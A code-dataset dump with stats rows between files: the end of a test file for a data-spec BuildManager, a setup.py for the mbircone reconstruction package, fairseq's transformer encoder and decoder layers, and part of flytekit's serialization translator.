'object_id': self.foo_bucket.foos['my_foo1'].object_id}),
'my_foo2': GroupBuilder('my_foo2', datasets={'my_data':
DatasetBuilder(
'my_data',
list(range(10, 20)),
attributes={'attr2': 20})},
attributes={'attr1': 'value2', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': self.foo_bucket.foos['my_foo2'].object_id})
}
self.setUpBucketBuilder()
self.setUpBucketSpec()
self.spec_catalog.register_spec(self.bucket_spec, 'test.yaml')
self.type_map.register_container_type(CORE_NAMESPACE, 'FooBucket', FooBucket)
self.type_map.register_map(FooBucket, self.setUpBucketMapper())
self.manager = BuildManager(self.type_map)
@abstractmethod
def setUpBucketBuilder(self):
raise NotImplementedError('Cannot run test unless setUpBucketBuilder is implemented')
@abstractmethod
def setUpBucketSpec(self):
raise NotImplementedError('Cannot run test unless setUpBucketSpec is implemented')
@abstractmethod
def setUpBucketMapper(self):
raise NotImplementedError('Cannot run test unless setUpBucketMapper is implemented')
def test_build(self):
        ''' Test default mapping for a Container that has a Container as an attribute value '''
builder = self.manager.build(self.foo_bucket)
self.assertDictEqual(builder, self.bucket_builder)
def test_construct(self):
container = self.manager.construct(self.bucket_builder)
self.assertEqual(container, self.foo_bucket)
class TestNestedContainersNoSubgroups(NestedBaseMixin, TestBase):
'''
Test BuildManager.build and BuildManager.construct when the
Container contains other Containers, but does not keep them in
additional subgroups
'''
def setUpBucketBuilder(self):
self.bucket_builder = GroupBuilder(
'test_foo_bucket',
groups=self.foo_builders,
attributes={'namespace': CORE_NAMESPACE, 'data_type': 'FooBucket', 'object_id': self.foo_bucket.object_id})
def setUpBucketSpec(self):
self.bucket_spec = GroupSpec('A test group specification for a data type containing data type',
name="test_foo_bucket",
data_type_def='FooBucket',
groups=[GroupSpec(
'the Foos in this bucket',
data_type_inc='Foo',
quantity=ZERO_OR_MANY)])
def setUpBucketMapper(self):
return ObjectMapper
class TestNestedContainersSubgroup(NestedBaseMixin, TestBase):
'''
Test BuildManager.build and BuildManager.construct when the
Container contains other Containers that are stored in a subgroup
'''
def setUpBucketBuilder(self):
tmp_builder = GroupBuilder('foo_holder', groups=self.foo_builders)
self.bucket_builder = GroupBuilder(
'test_foo_bucket',
groups={'foos': tmp_builder},
attributes={'namespace': CORE_NAMESPACE, 'data_type': 'FooBucket', 'object_id': self.foo_bucket.object_id})
def setUpBucketSpec(self):
tmp_spec = GroupSpec(
'A subgroup for Foos',
name='foo_holder',
groups=[GroupSpec('the Foos in this bucket',
data_type_inc='Foo',
quantity=ZERO_OR_MANY)])
self.bucket_spec = GroupSpec('A test group specification for a data type containing data type',
name="test_foo_bucket",
data_type_def='FooBucket',
groups=[tmp_spec])
def setUpBucketMapper(self):
class BucketMapper(ObjectMapper):
def __init__(self, spec):
super().__init__(spec)
self.unmap(spec.get_group('foo_holder'))
self.map_spec('foos', spec.get_group('foo_holder').get_data_type('Foo'))
return BucketMapper
class TestNestedContainersSubgroupSubgroup(NestedBaseMixin, TestBase):
'''
Test BuildManager.build and BuildManager.construct when the
Container contains other Containers that are stored in a subgroup
in a subgroup
'''
def setUpBucketBuilder(self):
tmp_builder = GroupBuilder('foo_holder', groups=self.foo_builders)
tmp_builder = GroupBuilder('foo_holder_holder', groups={'foo_holder': tmp_builder})
self.bucket_builder = GroupBuilder(
'test_foo_bucket',
groups={'foo_holder': tmp_builder},
attributes={'namespace': CORE_NAMESPACE, 'data_type': 'FooBucket', 'object_id': self.foo_bucket.object_id})
def setUpBucketSpec(self):
tmp_spec = GroupSpec('A subgroup for Foos',
name='foo_holder',
groups=[GroupSpec('the Foos in this bucket',
data_type_inc='Foo',
quantity=ZERO_OR_MANY)])
tmp_spec = GroupSpec('A subgroup to hold the subgroup', name='foo_holder_holder', groups=[tmp_spec])
self.bucket_spec = GroupSpec('A test group specification for a data type containing data type',
name="test_foo_bucket",
data_type_def='FooBucket',
groups=[tmp_spec])
def setUpBucketMapper(self):
class BucketMapper(ObjectMapper):
def __init__(self, spec):
super().__init__(spec)
self.unmap(spec.get_group('foo_holder_holder'))
self.unmap(spec.get_group('foo_holder_holder').get_group('foo_holder'))
self.map_spec('foos', spec.get_group('foo_holder_holder').get_group('foo_holder').get_data_type('Foo'))
return BucketMapper
def test_build(self):
        ''' Test default mapping for a Container that has a Container as an attribute value '''
builder = self.manager.build(self.foo_bucket)
self.assertDictEqual(builder, self.bucket_builder)
def test_construct(self):
container = self.manager.construct(self.bucket_builder)
self.assertEqual(container, self.foo_bucket)
class TestNoMappedAttribute(TestBase):
def test_build(self):
"""Test that an error is raised when a spec is not mapped to a container attribute."""
class Unmapper(ObjectMapper):
def __init__(self, spec):
super().__init__(spec)
self.unmap(self.spec.get_dataset('my_data')) # remove mapping from this spec to container attribute
self.type_map.register_map(Foo, Unmapper) # override
container_inst = Foo('my_foo', list(range(10)), 'value1', 10)
msg = (r"<class '.*Unmapper'> has no container attribute mapped to spec: %s"
% re.escape(str(self.foo_spec.get_dataset('my_data'))))
with self.assertRaisesRegex(ContainerConfigurationError, msg):
self.manager.build(container_inst)
class TestNoAttribute(TestBase):
def test_build(self):
"""Test that an error is raised when a spec is mapped to a non-existent container attribute."""
class Unmapper(ObjectMapper):
def __init__(self, spec):
super().__init__(spec)
self.map_spec("unknown", self.spec.get_dataset('my_data'))
self.type_map.register_map(Foo, Unmapper) # override
container_inst = Foo('my_foo', list(range(10)), 'value1', 10)
msg = ("Foo 'my_foo' does not have attribute 'unknown' for mapping to spec: %s"
% self.foo_spec.get_dataset('my_data'))
with self.assertRaisesWith(ContainerConfigurationError, msg):
self.manager.build(container_inst)
class TestTypeMap(TestBase):
def test_get_ns_dt_missing(self):
bldr = GroupBuilder('my_foo', attributes={'attr1': 'value1'})
dt = self.type_map.get_builder_dt(bldr)
ns = self.type_map.get_builder_ns(bldr)
self.assertIsNone(dt)
self.assertIsNone(ns)
def test_get_ns_dt(self):
bldr = GroupBuilder('my_foo', attributes={'attr1': 'value1', 'namespace': 'CORE', 'data_type': 'Foo',
'object_id': -1})
dt = self.type_map.get_builder_dt(bldr)
ns = self.type_map.get_builder_ns(bldr)
self.assertEqual(dt, 'Foo')
self.assertEqual(ns, 'CORE')
# TODO:
class TestWildCardNamedSpecs(TestCase):
pass
| 42.272727 | 119 | 0.579188 |
ae010ebfdaddbb3dddd347501f4986f4a32cc01b | 2,439 | py | Python | setup.py | DamonLee5/mbircone | 680cfd9714dce240e2060cce7a15020b1a640d65 | ["BSD-3-Clause"] | 1 | 2022-03-15T06:47:20.000Z | 2022-03-15T06:47:20.000Z | setup.py | DamonLee5/mbircone | 680cfd9714dce240e2060cce7a15020b1a640d65 | ["BSD-3-Clause"] | 7 | 2021-12-05T21:16:54.000Z | 2022-03-29T20:59:11.000Z | setup.py | DamonLee5/mbircone | 680cfd9714dce240e2060cce7a15020b1a640d65 | ["BSD-3-Clause"] | 1 | 2021-12-06T15:14:37.000Z | 2021-12-06T15:14:37.000Z |
import os
import sys
import numpy as np
from setuptools import setup, Extension
from Cython.Distutils import build_ext
NAME = "mbircone"
VERSION = "0.1"
DESCRIPTION = "Python Package for Cone Beam reconstruction"
REQUIRES = ['numpy','Cython','psutil','Pillow'] # external package dependencies
LICENSE = "BSD-3-Clause"
AUTHOR = "Soumendu Majee"
# Specifies directory containing cython functions to be compiled
PACKAGE_DIR = "mbircone"
SRC_FILES = [PACKAGE_DIR + '/src/allocate.c', PACKAGE_DIR + '/src/MBIRModularUtilities3D.c',
PACKAGE_DIR + '/src/icd3d.c', PACKAGE_DIR + '/src/recon3DCone.c',
PACKAGE_DIR + '/src/computeSysMatrix.c',
PACKAGE_DIR + '/src/interface.c', PACKAGE_DIR + '/interface_cy_c.pyx']
compiler_str = os.environ.get('CC')
# Set default to gcc in case CC is not set
if not compiler_str:
compiler_str = 'gcc'
# Single threaded clang compile
if compiler_str == 'clang':
c_extension = Extension(PACKAGE_DIR+'.interface_cy_c', SRC_FILES,
libraries=[],
language='c',
include_dirs=[np.get_include()])
# OpenMP gcc compile
if compiler_str =='gcc':
c_extension = Extension(PACKAGE_DIR+'.interface_cy_c', SRC_FILES,
libraries=[],
language='c',
include_dirs=[np.get_include()],
# for gcc-10 "-std=c11" can be added as a flag
extra_compile_args=["-std=c11","-O3", "-fopenmp","-Wno-unknown-pragmas"],
extra_link_args=["-lm","-fopenmp"])
# OpenMP icc compile
if compiler_str =='icc':
if sys.platform == 'linux':
os.environ['LDSHARED'] = 'icc -shared'
c_extension = Extension(PACKAGE_DIR+'.interface_cy_c', SRC_FILES,
libraries=[],
language='c',
include_dirs=[np.get_include()],
extra_compile_args=["-O3","-DICC","-qopenmp","-no-prec-div","-restrict","-ipo","-inline-calloc",
"-qopt-calloc","-no-ansi-alias","-xCORE-AVX2"],
extra_link_args=["-lm","-qopenmp"])
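# Defensive check (an addition, not in the original script): without it, an
# unsupported CC value would leave `c_extension` undefined and the setup()
# call below would raise a NameError.
if compiler_str not in ('clang', 'gcc', 'icc'):
    raise ValueError("Unsupported compiler '%s'; expected clang, gcc or icc." % compiler_str)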
setup(install_requires=REQUIRES,
packages=[PACKAGE_DIR],
zip_safe=False,
name=NAME,
version=VERSION,
description=DESCRIPTION,
author=AUTHOR,
license=LICENSE,
cmdclass={"build_ext": build_ext},
ext_modules=[c_extension]
)
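# Typical invocations (illustrative): the compiler is picked through the CC
# environment variable handled above, e.g.
#     CC=gcc pip install .
#     CC=icc pip install .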
| 32.959459 | 116 | 0.603526 |
f9ada37bde699213446c46c61c7f4636655f7cb4 | 16,857 | py | Python | fairseq/modules/transformer_layer.py | mpsilfve/fairseq | eb228ee74c6bc9803eb7dbd398d8cda16c55ccd2 | ["MIT"] | 115 | 2021-08-25T14:58:12.000Z | 2022-03-21T11:25:36.000Z | fairseq/modules/transformer_layer.py | mpsilfve/fairseq | eb228ee74c6bc9803eb7dbd398d8cda16c55ccd2 | ["MIT"] | 5 | 2021-09-13T10:48:28.000Z | 2021-12-21T13:52:25.000Z | fairseq/modules/transformer_layer.py | mpsilfve/fairseq | eb228ee74c6bc9803eb7dbd398d8cda16c55ccd2 | ["MIT"] | 11 | 2021-08-25T16:22:07.000Z | 2021-11-24T16:26:20.000Z |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Dict, List, Optional
import torch
import torch.nn as nn
from fairseq import utils
from fairseq.modules import LayerNorm, MultiheadAttention
from fairseq.modules.fairseq_dropout import FairseqDropout
from fairseq.modules.quant_noise import quant_noise
from torch import Tensor
class TransformerEncoderLayer(nn.Module):
"""Encoder layer block.
In the original paper each operation (multi-head attention or FFN) is
postprocessed with: `dropout -> add residual -> layernorm`. In the
tensor2tensor code they suggest that learning is more robust when
preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.encoder_normalize_before* to ``True``.
Args:
args (argparse.Namespace): parsed command-line arguments
"""
def __init__(self, args):
super().__init__()
self.args = args
self.embed_dim = args.encoder_embed_dim
self.quant_noise = getattr(args, 'quant_noise_pq', 0)
self.quant_noise_block_size = getattr(args, 'quant_noise_pq_block_size', 8) or 8
self.self_attn = self.build_self_attention(self.embed_dim, args)
self.self_attn_layer_norm = LayerNorm(self.embed_dim)
self.dropout_module = FairseqDropout(
args.dropout, module_name=self.__class__.__name__
)
self.activation_fn = utils.get_activation_fn(
activation=getattr(args, 'activation_fn', 'relu') or "relu"
)
activation_dropout_p = getattr(args, "activation_dropout", 0) or 0
if activation_dropout_p == 0:
# for backwards compatibility with models that use args.relu_dropout
activation_dropout_p = getattr(args, "relu_dropout", 0) or 0
self.activation_dropout_module = FairseqDropout(
float(activation_dropout_p), module_name=self.__class__.__name__
)
self.normalize_before = args.encoder_normalize_before
self.fc1 = self.build_fc1(
self.embed_dim,
args.encoder_ffn_embed_dim,
self.quant_noise,
self.quant_noise_block_size,
)
self.fc2 = self.build_fc2(
args.encoder_ffn_embed_dim,
self.embed_dim,
self.quant_noise,
self.quant_noise_block_size,
)
self.final_layer_norm = LayerNorm(self.embed_dim)
def build_fc1(self, input_dim, output_dim, q_noise, qn_block_size):
return quant_noise(
nn.Linear(input_dim, output_dim), p=q_noise, block_size=qn_block_size
)
def build_fc2(self, input_dim, output_dim, q_noise, qn_block_size):
return quant_noise(
nn.Linear(input_dim, output_dim), p=q_noise, block_size=qn_block_size
)
def build_self_attention(self, embed_dim, args):
return MultiheadAttention(
embed_dim,
args.encoder_attention_heads,
dropout=args.attention_dropout,
self_attention=True,
q_noise=self.quant_noise,
qn_block_size=self.quant_noise_block_size,
)
def residual_connection(self, x, residual):
return residual + x
def upgrade_state_dict_named(self, state_dict, name):
"""
Rename layer norm states from `...layer_norms.0.weight` to
`...self_attn_layer_norm.weight` and `...layer_norms.1.weight` to
`...final_layer_norm.weight`
"""
layer_norm_map = {"0": "self_attn_layer_norm", "1": "final_layer_norm"}
for old, new in layer_norm_map.items():
for m in ("weight", "bias"):
k = "{}.layer_norms.{}.{}".format(name, old, m)
if k in state_dict:
state_dict["{}.{}.{}".format(name, new, m)] = state_dict[k]
del state_dict[k]
def forward(self, x, encoder_padding_mask: Optional[Tensor], attn_mask: Optional[Tensor] = None):
"""
Args:
x (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)`
encoder_padding_mask (ByteTensor): binary ByteTensor of shape
`(batch, seq_len)` where padding elements are indicated by ``1``.
attn_mask (ByteTensor): binary tensor of shape `(tgt_len, src_len)`,
where `tgt_len` is the length of output and `src_len` is the
length of input, though here both are equal to `seq_len`.
`attn_mask[tgt_i, src_j] = 1` means that when calculating the
embedding for `tgt_i`, we exclude (mask out) `src_j`. This is
useful for strided self-attention.
Returns:
encoded output of shape `(seq_len, batch, embed_dim)`
"""
# anything in original attn_mask = 1, becomes -1e8
# anything in original attn_mask = 0, becomes 0
# Note that we cannot use -inf here, because at some edge cases,
# the attention weight (before softmax) for some padded element in query
# will become -inf, which results in NaN in model parameters
if attn_mask is not None:
attn_mask = attn_mask.masked_fill(attn_mask.to(torch.bool), -1e8)
residual = x
if self.normalize_before:
x = self.self_attn_layer_norm(x)
x, _ = self.self_attn(
query=x,
key=x,
value=x,
key_padding_mask=encoder_padding_mask,
need_weights=False,
attn_mask=attn_mask,
)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.self_attn_layer_norm(x)
residual = x
if self.normalize_before:
x = self.final_layer_norm(x)
x = self.activation_fn(self.fc1(x))
x = self.activation_dropout_module(x)
x = self.fc2(x)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.final_layer_norm(x)
return x
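# Minimal smoke test for this layer (illustrative; the hyper-parameter
# values below are assumptions, not fairseq defaults):
#
#     import argparse, torch
#     args = argparse.Namespace(
#         encoder_embed_dim=16, encoder_ffn_embed_dim=32,
#         encoder_attention_heads=2, dropout=0.0, attention_dropout=0.0,
#         encoder_normalize_before=False)
#     layer = TransformerEncoderLayer(args)
#     x = torch.randn(5, 2, 16)                # (seq_len, batch, embed_dim)
#     y = layer(x, encoder_padding_mask=None)  # same shape as x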
class TransformerDecoderLayer(nn.Module):
"""Decoder layer block.
In the original paper each operation (multi-head attention, encoder
attention or FFN) is postprocessed with: `dropout -> add residual ->
layernorm`. In the tensor2tensor code they suggest that learning is more
robust when preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.decoder_normalize_before* to ``True``.
Args:
args (argparse.Namespace): parsed command-line arguments
no_encoder_attn (bool, optional): whether to attend to encoder outputs
(default: False).
"""
def __init__(
self, args, no_encoder_attn=False, add_bias_kv=False, add_zero_attn=False
):
super().__init__()
self.embed_dim = args.decoder_embed_dim
self.dropout_module = FairseqDropout(
args.dropout, module_name=self.__class__.__name__
)
self.quant_noise = getattr(args, "quant_noise_pq", 0)
self.quant_noise_block_size = getattr(args, "quant_noise_pq_block_size", 8)
self.cross_self_attention = getattr(args, "cross_self_attention", False)
self.self_attn = self.build_self_attention(
self.embed_dim,
args,
add_bias_kv=add_bias_kv,
add_zero_attn=add_zero_attn,
)
self.activation_fn = utils.get_activation_fn(
activation=str(args.activation_fn)
if getattr(args, "activation_fn", None) is not None
else "relu"
)
activation_dropout_p = getattr(args, "activation_dropout", 0) or 0
if activation_dropout_p == 0:
# for backwards compatibility with models that use args.relu_dropout
activation_dropout_p = getattr(args, "relu_dropout", 0) or 0
self.activation_dropout_module = FairseqDropout(
float(activation_dropout_p), module_name=self.__class__.__name__
)
self.normalize_before = args.decoder_normalize_before
# use layerNorm rather than FusedLayerNorm for exporting.
# char_inputs can be used to determint this.
# TODO remove this once we update apex with the fix
export = getattr(args, "char_inputs", False)
self.self_attn_layer_norm = LayerNorm(self.embed_dim, export=export)
if no_encoder_attn:
self.encoder_attn = None
self.encoder_attn_layer_norm = None
else:
self.encoder_attn = self.build_encoder_attention(self.embed_dim, args)
self.encoder_attn_layer_norm = LayerNorm(self.embed_dim, export=export)
self.fc1 = self.build_fc1(
self.embed_dim,
args.decoder_ffn_embed_dim,
self.quant_noise,
self.quant_noise_block_size,
)
self.fc2 = self.build_fc2(
args.decoder_ffn_embed_dim,
self.embed_dim,
self.quant_noise,
self.quant_noise_block_size,
)
self.final_layer_norm = LayerNorm(self.embed_dim, export=export)
self.need_attn = True
self.onnx_trace = False
def build_fc1(self, input_dim, output_dim, q_noise, qn_block_size):
return quant_noise(nn.Linear(input_dim, output_dim), q_noise, qn_block_size)
def build_fc2(self, input_dim, output_dim, q_noise, qn_block_size):
return quant_noise(nn.Linear(input_dim, output_dim), q_noise, qn_block_size)
def build_self_attention(
self, embed_dim, args, add_bias_kv=False, add_zero_attn=False
):
return MultiheadAttention(
embed_dim,
args.decoder_attention_heads,
dropout=args.attention_dropout,
add_bias_kv=add_bias_kv,
add_zero_attn=add_zero_attn,
self_attention=not getattr(args, "cross_self_attention", False),
q_noise=self.quant_noise,
qn_block_size=self.quant_noise_block_size,
)
def build_encoder_attention(self, embed_dim, args):
return MultiheadAttention(
embed_dim,
args.decoder_attention_heads,
kdim=getattr(args, "encoder_embed_dim", None),
vdim=getattr(args, "encoder_embed_dim", None),
dropout=args.attention_dropout,
encoder_decoder_attention=True,
q_noise=self.quant_noise,
qn_block_size=self.quant_noise_block_size,
)
def prepare_for_onnx_export_(self):
self.onnx_trace = True
def residual_connection(self, x, residual):
return residual + x
def forward(
self,
x,
encoder_out: Optional[torch.Tensor] = None,
encoder_padding_mask: Optional[torch.Tensor] = None,
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
prev_self_attn_state: Optional[List[torch.Tensor]] = None,
prev_attn_state: Optional[List[torch.Tensor]] = None,
self_attn_mask: Optional[torch.Tensor] = None,
self_attn_padding_mask: Optional[torch.Tensor] = None,
need_attn: bool = False,
need_head_weights: bool = False,
):
"""
Args:
x (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)`
encoder_padding_mask (ByteTensor, optional): binary
ByteTensor of shape `(batch, src_len)` where padding
elements are indicated by ``1``.
need_attn (bool, optional): return attention weights
need_head_weights (bool, optional): return attention weights
for each head (default: return average over heads).
Returns:
encoded output of shape `(seq_len, batch, embed_dim)`
"""
if need_head_weights:
need_attn = True
residual = x
if self.normalize_before:
x = self.self_attn_layer_norm(x)
if prev_self_attn_state is not None:
prev_key, prev_value = prev_self_attn_state[:2]
saved_state: Dict[str, Optional[Tensor]] = {
"prev_key": prev_key,
"prev_value": prev_value,
}
if len(prev_self_attn_state) >= 3:
saved_state["prev_key_padding_mask"] = prev_self_attn_state[2]
assert incremental_state is not None
self.self_attn._set_input_buffer(incremental_state, saved_state)
_self_attn_input_buffer = self.self_attn._get_input_buffer(incremental_state)
if self.cross_self_attention and not (
incremental_state is not None
and _self_attn_input_buffer is not None
and "prev_key" in _self_attn_input_buffer
):
if self_attn_mask is not None:
assert encoder_out is not None
self_attn_mask = torch.cat(
(x.new_zeros(x.size(0), encoder_out.size(0)), self_attn_mask), dim=1
)
if self_attn_padding_mask is not None:
if encoder_padding_mask is None:
assert encoder_out is not None
encoder_padding_mask = self_attn_padding_mask.new_zeros(
encoder_out.size(1), encoder_out.size(0)
)
self_attn_padding_mask = torch.cat(
(encoder_padding_mask, self_attn_padding_mask), dim=1
)
assert encoder_out is not None
y = torch.cat((encoder_out, x), dim=0)
else:
y = x
x, attn = self.self_attn(
query=x,
key=y,
value=y,
key_padding_mask=self_attn_padding_mask,
incremental_state=incremental_state,
need_weights=False,
attn_mask=self_attn_mask,
)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.self_attn_layer_norm(x)
if self.encoder_attn is not None and encoder_out is not None:
residual = x
if self.normalize_before:
x = self.encoder_attn_layer_norm(x)
if prev_attn_state is not None:
prev_key, prev_value = prev_attn_state[:2]
saved_state: Dict[str, Optional[Tensor]] = {
"prev_key": prev_key,
"prev_value": prev_value,
}
if len(prev_attn_state) >= 3:
saved_state["prev_key_padding_mask"] = prev_attn_state[2]
assert incremental_state is not None
self.encoder_attn._set_input_buffer(incremental_state, saved_state)
x, attn = self.encoder_attn(
query=x,
key=encoder_out,
value=encoder_out,
key_padding_mask=encoder_padding_mask,
incremental_state=incremental_state,
static_kv=True,
need_weights=need_attn or (not self.training and self.need_attn),
need_head_weights=need_head_weights,
)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.encoder_attn_layer_norm(x)
residual = x
if self.normalize_before:
x = self.final_layer_norm(x)
x = self.activation_fn(self.fc1(x))
x = self.activation_dropout_module(x)
x = self.fc2(x)
x = self.dropout_module(x)
x = self.residual_connection(x, residual)
if not self.normalize_before:
x = self.final_layer_norm(x)
if self.onnx_trace and incremental_state is not None:
saved_state = self.self_attn._get_input_buffer(incremental_state)
assert saved_state is not None
if self_attn_padding_mask is not None:
self_attn_state = [
saved_state["prev_key"],
saved_state["prev_value"],
saved_state["prev_key_padding_mask"],
]
else:
self_attn_state = [saved_state["prev_key"], saved_state["prev_value"]]
return x, attn, self_attn_state
return x, attn, None
def make_generation_fast_(self, need_attn: bool = False, **kwargs):
self.need_attn = need_attn
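# Incremental decoding sketch (illustrative; `layer`, `x`, `enc_out` and
# `tgt_len` are stand-ins): callers thread a per-layer state dict through
# forward() so self-attention keys/values are cached between time steps
# instead of being recomputed:
#
#     state = {}
#     for t in range(tgt_len):
#         x_t, attn, _ = layer(x[t:t + 1], encoder_out=enc_out,
#                              incremental_state=state)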
| 40.42446 | 101 | 0.622649 |
5d26fb6a59d1f8bc72de6daead3774133fa10e50 | 16,617 | py | Python | flytekit/common/translator.py | fediazgon/flytekit | 2c9fab495b7daf4504a927a4077b2e6799752a4e | ["Apache-2.0"] | null | null | null | flytekit/common/translator.py | fediazgon/flytekit | 2c9fab495b7daf4504a927a4077b2e6799752a4e | ["Apache-2.0"] | null | null | null | flytekit/common/translator.py | fediazgon/flytekit | 2c9fab495b7daf4504a927a4077b2e6799752a4e | ["Apache-2.0"] | null | null | null |
from collections import OrderedDict
from typing import Callable, List, Optional, Union
from flytekit.common import constants as _common_constants
from flytekit.common.utils import _dnsify
from flytekit.core.base_task import PythonTask
from flytekit.core.condition import BranchNode
from flytekit.core.context_manager import SerializationSettings
from flytekit.core.launch_plan import LaunchPlan, ReferenceLaunchPlan
from flytekit.core.node import Node
from flytekit.core.python_auto_container import PythonAutoContainerTask
from flytekit.core.reference_entity import ReferenceEntity
from flytekit.core.task import ReferenceTask
from flytekit.core.workflow import ReferenceWorkflow, WorkflowBase
from flytekit.models import common as _common_models
from flytekit.models import interface as interface_models
from flytekit.models import launch_plan as _launch_plan_models
from flytekit.models import task as task_models
from flytekit.models.admin import workflow as admin_workflow_models
from flytekit.models.core import identifier as _identifier_model
from flytekit.models.core import workflow as _core_wf
from flytekit.models.core import workflow as workflow_model
from flytekit.models.core.workflow import BranchNode as BranchNodeModel
from flytekit.models.core.workflow import TaskNodeOverrides
FlyteLocalEntity = Union[
PythonTask,
BranchNode,
Node,
LaunchPlan,
WorkflowBase,
ReferenceWorkflow,
ReferenceTask,
ReferenceLaunchPlan,
ReferenceEntity,
]
FlyteControlPlaneEntity = Union[
task_models.TaskSpec,
_launch_plan_models.LaunchPlan,
admin_workflow_models.WorkflowSpec,
workflow_model.Node,
BranchNodeModel,
]
def to_serializable_case(
entity_mapping: OrderedDict, settings: SerializationSettings, c: _core_wf.IfBlock
) -> _core_wf.IfBlock:
if c is None:
raise ValueError("Cannot convert none cases to registrable")
then_node = get_serializable(entity_mapping, settings, c.then_node)
return _core_wf.IfBlock(condition=c.condition, then_node=then_node)
def to_serializable_cases(
entity_mapping: OrderedDict, settings: SerializationSettings, cases: List[_core_wf.IfBlock]
) -> Optional[List[_core_wf.IfBlock]]:
if cases is None:
return None
ret_cases = []
for c in cases:
ret_cases.append(to_serializable_case(entity_mapping, settings, c))
return ret_cases
def _fast_serialize_command_fn(
settings: SerializationSettings, task: PythonAutoContainerTask
) -> Callable[[SerializationSettings], List[str]]:
default_command = task.get_default_command(settings)
dest_dir = (
settings.fast_serialization_settings.destination_dir if settings.fast_serialization_settings is not None else ""
)
if dest_dir is None or dest_dir == "":
dest_dir = "{{ .dest_dir }}"
def fn(settings: SerializationSettings) -> List[str]:
return [
"pyflyte-fast-execute",
"--additional-distribution",
"{{ .remote_package_path }}",
"--dest-dir",
dest_dir,
"--",
*default_command,
]
return fn
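# For a task whose default command is ["pyflyte-execute", ...], the wrapper
# above produces (sketch; the {{ ... }} placeholders are substituted by the
# backend at execution time):
#
#     ["pyflyte-fast-execute",
#      "--additional-distribution", "{{ .remote_package_path }}",
#      "--dest-dir", "{{ .dest_dir }}",
#      "--", "pyflyte-execute", ...]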
def get_serializable_task(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: FlyteLocalEntity,
) -> task_models.TaskSpec:
task_id = _identifier_model.Identifier(
_identifier_model.ResourceType.TASK,
settings.project,
settings.domain,
entity.name,
settings.version,
)
if settings.should_fast_serialize() and isinstance(entity, PythonAutoContainerTask):
# For fast registration, we'll need to muck with the command, but only for certain kinds of tasks. Specifically,
# tasks that rely on user code defined in the container. This should be encapsulated by the auto container
# parent class
entity.set_command_fn(_fast_serialize_command_fn(settings, entity))
tt = task_models.TaskTemplate(
id=task_id,
type=entity.task_type,
metadata=entity.metadata.to_taskmetadata_model(),
interface=entity.interface,
custom=entity.get_custom(settings),
container=entity.get_container(settings),
task_type_version=entity.task_type_version,
security_context=entity.security_context,
config=entity.get_config(settings),
k8s_pod=entity.get_k8s_pod(settings),
)
if settings.should_fast_serialize() and isinstance(entity, PythonAutoContainerTask):
entity.reset_command_fn()
return task_models.TaskSpec(template=tt)
def get_serializable_workflow(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: WorkflowBase,
) -> admin_workflow_models.WorkflowSpec:
# Get node models
upstream_node_models = [
get_serializable(entity_mapping, settings, n)
for n in entity.nodes
if n.id != _common_constants.GLOBAL_INPUT_NODE_ID
]
sub_wfs = []
for n in entity.nodes:
if isinstance(n.flyte_entity, WorkflowBase):
if isinstance(n.flyte_entity, ReferenceEntity):
raise Exception(
f"Sorry, reference subworkflows do not work right now, please use the launch plan instead for the "
f"subworkflow you're trying to invoke. Node: {n}"
)
sub_wf_spec = get_serializable(entity_mapping, settings, n.flyte_entity)
if not isinstance(sub_wf_spec, admin_workflow_models.WorkflowSpec):
raise Exception(
f"Serialized form of a workflow should be an admin.WorkflowSpec but {type(sub_wf_spec)} found instead"
)
sub_wfs.append(sub_wf_spec.template)
sub_wfs.extend(sub_wf_spec.sub_workflows)
if isinstance(n.flyte_entity, BranchNode):
if_else: workflow_model.IfElseBlock = n.flyte_entity._ifelse_block
# See comment in get_serializable_branch_node also. Again this is a List[Node] even though it's supposed
# to be a List[workflow_model.Node]
leaf_nodes: List[Node] = filter( # noqa
None,
[
if_else.case.then_node,
*([] if if_else.other is None else [x.then_node for x in if_else.other]),
if_else.else_node,
],
)
for leaf_node in leaf_nodes:
if isinstance(leaf_node.flyte_entity, WorkflowBase):
sub_wf_spec = get_serializable(entity_mapping, settings, leaf_node.flyte_entity)
sub_wfs.append(sub_wf_spec.template)
sub_wfs.extend(sub_wf_spec.sub_workflows)
wf_id = _identifier_model.Identifier(
resource_type=_identifier_model.ResourceType.WORKFLOW,
project=settings.project,
domain=settings.domain,
name=entity.name,
version=settings.version,
)
wf_t = workflow_model.WorkflowTemplate(
id=wf_id,
metadata=entity.workflow_metadata.to_flyte_model(),
metadata_defaults=entity.workflow_metadata_defaults.to_flyte_model(),
interface=entity.interface,
nodes=upstream_node_models,
outputs=entity.output_bindings,
)
return admin_workflow_models.WorkflowSpec(template=wf_t, sub_workflows=list(set(sub_wfs)))
def get_serializable_launch_plan(
entity_mapping: OrderedDict,
settings: SerializationSettings,
entity: LaunchPlan,
) -> _launch_plan_models.LaunchPlan:
wf_spec = get_serializable(entity_mapping, settings, entity.workflow)
lps = _launch_plan_models.LaunchPlanSpec(
workflow_id=wf_spec.template.id,
entity_metadata=_launch_plan_models.LaunchPlanMetadata(
schedule=entity.schedule,
notifications=entity.notifications,
),
default_inputs=entity.parameters,
fixed_inputs=entity.fixed_inputs,
labels=entity.labels or _common_models.Labels({}),
annotations=entity.annotations or _common_models.Annotations({}),
auth_role=entity._auth_role or _common_models.AuthRole(),
raw_output_data_config=entity.raw_output_data_config or _common_models.RawOutputDataConfig(""),
max_parallelism=entity.max_parallelism,
)
lp_id = _identifier_model.Identifier(
resource_type=_identifier_model.ResourceType.LAUNCH_PLAN,
project=settings.project,
domain=settings.domain,
name=entity.name,
version=settings.version,
)
